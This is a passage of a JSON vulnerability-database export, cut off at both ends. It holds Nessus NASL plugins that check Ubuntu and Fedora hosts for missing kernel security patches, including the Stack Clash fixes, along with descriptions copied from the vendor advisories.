\"CVE-2016-2085\", \"CVE-2016-2550\", \"CVE-2016-2847\");\n script_xref(name:\"USN\", value:\"2946-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerabilities (USN-2946-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Venkatesh Pottem discovered a use-after-free vulnerability in the\nLinux kernel's CXGB3 driver. A local attacker could use this to cause\na denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the\nLinux Extended Verification Module (EVM). An attacker could use this\nto affect system integrity. (CVE-2016-2085)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted\nfile descriptors to the original opener for in-flight file descriptors\nsent over a unix domain socket. A local attacker could use this to\ncause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nIt was discovered that the Linux kernel did not enforce limits on the\namount of data allocated to buffer pipes. A local attacker could use\nthis to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2946-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected linux-image-3.13-generic,\nlinux-image-3.13-generic-lpae and / or linux-image-3.13-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-8812\", \"CVE-2016-2085\", \"CVE-2016-2550\", \"CVE-2016-2847\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2946-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-85-generic\", pkgver:\"3.13.0-85.129\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-85-generic-lpae\", pkgver:\"3.13.0-85.129\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-85-lowlatency\", pkgver:\"3.13.0-85.129\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:23", "description": "Venkatesh Pottem discovered a use-after-free vulnerability in the Linux kernel's CXGB3 driver. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the Linux Extended Verification Module (EVM). An attacker could use this to affect system integrity. (CVE-2016-2085)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted file descriptors to the original opener for in-flight file descriptors sent over a unix domain socket. A local attacker could use this to cause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nIt was discovered that the Linux kernel did not enforce limits on the amount of data allocated to buffer pipes. A local attacker could use this to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-04-07T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-vivid vulnerabilities (USN-2949-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8812", "CVE-2016-2085", "CVE-2016-2550", "CVE-2016-2847"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2949-1.NASL", "href": "https://www.tenable.com/plugins/nessus/90406", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2949-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90406);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2015-8812\", \"CVE-2016-2085\", \"CVE-2016-2550\", \"CVE-2016-2847\");\n script_xref(name:\"USN\", value:\"2949-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-vivid vulnerabilities (USN-2949-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Venkatesh Pottem discovered a use-after-free vulnerability in the\nLinux kernel's CXGB3 driver. A local attacker could use this to cause\na denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the\nLinux Extended Verification Module (EVM). An attacker could use this\nto affect system integrity. (CVE-2016-2085)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted\nfile descriptors to the original opener for in-flight file descriptors\nsent over a unix domain socket. A local attacker could use this to\ncause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nIt was discovered that the Linux kernel did not enforce limits on the\namount of data allocated to buffer pipes. A local attacker could use\nthis to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2949-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected linux-image-3.19-generic,\nlinux-image-3.19-generic-lpae and / or linux-image-3.19-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-8812\", \"CVE-2016-2085\", \"CVE-2016-2550\", \"CVE-2016-2847\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2949-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-58-generic\", pkgver:\"3.19.0-58.64~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-58-generic-lpae\", pkgver:\"3.19.0-58.64~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-58-lowlatency\", pkgver:\"3.19.0-58.64~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.19-generic / linux-image-3.19-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:23", "description": "Venkatesh Pottem discovered a use-after-free vulnerability in the Linux kernel's CXGB3 driver. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the Linux Extended Verification Module (EVM). An attacker could use this to affect system integrity. (CVE-2016-2085)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted file descriptors to the original opener for in-flight file descriptors sent over a unix domain socket. A local attacker could use this to cause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nIt was discovered that the Linux kernel did not enforce limits on the amount of data allocated to buffer pipes. A local attacker could use this to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-04-07T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS : linux-lts-trusty vulnerabilities (USN-2946-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8812", "CVE-2016-2085", "CVE-2016-2550", "CVE-2016-2847"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2946-2.NASL", "href": "https://www.tenable.com/plugins/nessus/90401", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2946-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90401);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2015-8812\", \"CVE-2016-2085\", \"CVE-2016-2550\", \"CVE-2016-2847\");\n script_xref(name:\"USN\", value:\"2946-2\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-trusty vulnerabilities (USN-2946-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Venkatesh Pottem discovered a use-after-free vulnerability in the\nLinux kernel's CXGB3 driver. A local attacker could use this to cause\na denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the\nLinux Extended Verification Module (EVM). An attacker could use this\nto affect system integrity. (CVE-2016-2085)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted\nfile descriptors to the original opener for in-flight file descriptors\nsent over a unix domain socket. A local attacker could use this to\ncause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nIt was discovered that the Linux kernel did not enforce limits on the\namount of data allocated to buffer pipes. A local attacker could use\nthis to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2946-2/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected linux-image-3.13-generic and / or\nlinux-image-3.13-generic-lpae packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-8812\", \"CVE-2016-2085\", \"CVE-2016-2550\", \"CVE-2016-2847\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2946-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-85-generic\", pkgver:\"3.13.0-85.129~precise1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-85-generic-lpae\", pkgver:\"3.13.0-85.129~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:30", "description": "The 4.11.6 update contains a number of important fixes across the tree, including the recently announced 'stack clash'\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-28T00:00:00", "type": "nessus", "title": "Fedora 24 : kernel (2017-05f10e29f4) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364", "CVE-2017-1000365", "CVE-2017-1000370", "CVE-2017-1000371", "CVE-2017-1000379"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-05F10E29F4.NASL", "href": "https://www.tenable.com/plugins/nessus/101068", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-05f10e29f4.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101068);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000370\", \"CVE-2017-1000371\", \"CVE-2017-1000379\");\n script_xref(name:\"FEDORA\", value:\"2017-05f10e29f4\");\n\n script_name(english:\"Fedora 24 : kernel (2017-05f10e29f4) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.11.6 update contains a number of important fixes across the\ntree, including the recently announced 'stack clash'\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-05f10e29f4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000370\", \"CVE-2017-1000371\", \"CVE-2017-1000379\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-05f10e29f4\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"kernel-4.11.6-101.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:47", "description": "The 4.11.6 update contains a number of important fixes across the tree, including the recently announced 'stack clash'\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-26T00:00:00", "type": "nessus", "title": "Fedora 25 : kernel (2017-d7bc1b3056) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364", "CVE-2017-1000365", "CVE-2017-1000370", "CVE-2017-1000371", "CVE-2017-1000379"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-D7BC1B3056.NASL", "href": "https://www.tenable.com/plugins/nessus/101037", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-d7bc1b3056.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101037);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\", \"CVE-2017-1000365\", \"CVE-2017-1000370\", \"CVE-2017-1000371\", \"CVE-2017-1000379\");\n script_xref(name:\"FEDORA\", value:\"2017-d7bc1b3056\");\n\n script_name(english:\"Fedora 25 : kernel (2017-d7bc1b3056) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.11.6 update contains a number of important fixes across the\ntree, including the recently announced 'stack clash'\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-d7bc1b3056\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n 